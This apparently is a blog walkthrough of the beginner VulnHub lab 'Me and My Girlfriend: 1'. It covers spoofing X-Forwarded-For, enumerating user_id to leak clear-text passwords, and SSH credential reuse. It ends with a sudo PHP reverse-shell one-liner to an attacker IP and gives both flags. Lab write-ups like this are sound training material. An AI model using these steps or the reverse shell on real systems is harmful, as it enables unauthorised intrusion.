Machine Link: https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/#
Machine Author: TW1C3 (@makegreatagain_)
Description (as given by the machine author):
This VM tells us that there are a couple of lovers namely Alice and Bob, where the couple was originally very romantic, but since Alice worked at a private company, “Ceban Corp”, something has changed from Alice’s attitude towards Bob like something is “hidden”, And Bob asks for your help to get what Alice is hiding and get full access to the company!
Level: Beginner
# of Flags: 2
Machine Published Date: 13-Dec-2019
The Solution:
It had been a while that I had spoilt my hands on any lab machines. I was browsing through vulnhub.com, I came across this interesting machine and thought of solving it. I took the following steps in capturing both the flags.
Since I knew the MAC address of the machine (00:0C:29:97:56:3F), and I knew the IP range of the NAT interface (172.16.190.0/24), I ran the below Nmap scan to obtain the IP address of the machine and the open ports.
nmap -sS -p 21,22,23,80,443 172.16.190.0/24
From the Nmap output, it was known that the IP address assigned to the virtual machine was 172.16.190.249
and ports TCP/22
and TCP/80
were open. This implies that the server was hosting a web application and SSH was being used for remote administration of the machine.
Now we browse the application on the browser and we encounter an interesting message on the webpage that says “Who are you? Hacker? Sorry This Site Can Only Be Accessed local!”
To dig further into this, I intercepted the request and response in Burp and found another interesting comment appended to this line in the HTML code. The comment said “<!– Maybe you can search how to use x-forwarded-for –>”.
Now I started adding X-Forwarded-For: 127.0.0.1
in each of my request and the application started working.
Now we see a registration option on the application. This is the easiest way to gain access to the application. I registered myself to the application and proceeded for login.
After successful login, there were 3 available options – Dashboard (current page), Profile, and Logout. So my next probable choice was to go for the Profile section. In the profile page, URL had a parameter user_id
which had a value of 12. I moved the request to Intruder in the Burp and passed sequential values from 1 – 15 as payload and observed that different values of user_id
gave information about the other users including their clear text credentials.
Analyzing the responses in the intruder, I observed that the user_id 5 corresponds to Alice’s profile. Alice’s credentials were username as ‘alice’ and password as ‘4lic3’.
Assuming Alice uses the same credentials for all her login, I tried my luck on the SSH port that was open on the server. The credentials worked and now I have the access of the server. Looking for Alice’s directories especially the hidden ones, I ran ls -a
command. Another interesting find. A directory named ‘.my_secret’ was present in Alice’s home folder. Navigating to the directory and listing the files, I found two files – my_notes.txt and flag1.txt.
Using cat
command, I read both the files and found the first flag and hint for the next one.
Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
Now to gain the root-level access first, I ran sudo su -
as the basic option, but it didn’t work out. Then I moved on to check what sudo permissions does Alice have. I found that she has NOPASSWD permission to run PHP files as a root user.
To exploit this misconfiguration, I hosted a Netcat listener on my system on port 1234 and ran the following command from Alice’s login. I got a reverse root shell on my Netcat listener.
sudo php -r '$sock=fsockopen("172.16.190.1", 1234); exec("/bin/sh -i <&3 >&3 2>&3");'
Navigating to /root
directory and listing all the files, I get only one file – flag2.txt. Using the cat
command, I read the flag2.txt file. I captured the second and the final flag.
Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
I hope you liked the blog and this will be helpful while you solve this machine. New learning for me in this machine was to use PHP to get a reverse shell connection. I had learnt these techniques earlier but never had a chance to use it.
Lastly, I would like to thank the author of this machine for his dedication and efforts that he had put into creating this machine. Cheers TW1C3!!!